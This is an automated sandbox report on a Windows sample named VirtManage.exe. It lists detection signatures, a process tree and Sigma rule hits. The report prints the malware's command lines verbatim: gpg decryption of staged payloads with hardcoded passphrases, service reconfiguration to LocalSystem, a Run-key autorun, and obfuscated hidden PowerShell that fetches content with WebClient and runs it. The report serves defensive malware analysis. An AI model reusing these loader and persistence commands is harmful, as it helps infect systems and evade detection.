Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VirtManage.exe

Overview

General Information

Sample name:VirtManage.exe
Analysis ID:1632485
MD5:582b28a61d76e50d86c4b17dee4a9f42
SHA1:762195d453f50d58f882e0d19ce6ae4b50f414bf
SHA256:5f79572d35507c591a773925b8786c6caea69b19ef164b305d71070caf976707
Tags:exeFORTUNEPRINTCENTRELIMITEDuser-SquiblydooBlog
Infos:

Detection

Score:46
Range:0 - 100
Confidence:100%

Compliance

Score:34
Range:0 - 100

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains a domain name check
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • VirtManage.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\VirtManage.exe" MD5: 582B28A61D76E50D86C4B17DEE4A9F42)
    • gpg.exe (PID: 6968 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\5FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 7084 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\1FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 1988 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\2FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7za.exe (PID: 2688 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 2568 cmdline: msiexec.exe /i "C:\ProgramData\Microsoft\MicrosoftAPI\RVTools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • gpg.exe (PID: 5860 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\Cert.txt --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\3FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 6456 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\MicrosoftAPI\4FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1988 cmdline: sc config msdtc start= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 1192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3148 cmdline: sc config msdtc obj= "LocalSystem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winapi.exe (PID: 348 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe MD5: ADB9B72679B88DDE1749E0A438222156)
      • powershell.exe (PID: 1000 cmdline: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 7428 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 7460 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • whoami.exe (PID: 7556 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • msiexec.exe (PID: 5696 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6820 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6DE2D63DBA183F9FE048D9EF7023AC72 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • 7za.exe (PID: 7052 cmdline: C:\ProgramData\Microsoft\MicrosoftAPI\7za x C:\ProgramData\Microsoft\MicrosoftAPI\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\MicrosoftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7052 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • winapi.exe (PID: 4564 cmdline: "C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe" MD5: ADB9B72679B88DDE1749E0A438222156)
    • powershell.exe (PID: 6080 cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7792 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B4F.tmp" "c:\Users\user\AppData\Local\Temp\CSCC2520B897D0D4F99AF1935CDE7767C35.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • whoami.exe (PID: 7856 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VirtManage.exe, ProcessId: 6732, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateOleview
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1000, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", ProcessId: 7428, ProcessName: csc.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentImage: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentProcessId: 348, ParentProcessName: winapi.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -Va
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7428, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D22.tmp" "c:\Users\user\AppData\Local\Temp\2s4bn4bw\CSC355371FC2ED34AC6B0D2C6DC18B9358D.TMP", ProcessId: 7460, ProcessName: cvtres.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1000, TargetFilename: C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline
Sigma detected: Local Accounts Discovery
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\whoami.exe", CommandLine: "C:\Windows\system32\whoami.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1000, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\whoami.exe", ProcessId: 7556, ProcessName: whoami.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentImage: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe, ParentProcessId: 348, ParentProcessName: winapi.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -Va
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5240, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1000, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline", ProcessId: 7428, ProcessName: csc.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dllAvira: detection malicious, Label: TR/Redcap.rclpi
Source: C:\ProgramData\Microsoft\UpdateDesktop\aclui.dllAvira: detection malicious, Label: TR/Redcap.rclpi
Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui.dllAvira: detection malicious, Label: TR/Redcap.tjlhz
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dllReversingLabs: Detection: 62%
Source: C:\ProgramData\Microsoft\MicrosoftAPI\aclui.dllReversingLabs: Detection: 62%
Source: C:\ProgramData\Microsoft\UpdateDesktop\aclui.dllReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: VirtManage.exeVirustotal: Detection: 13%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.5% probability
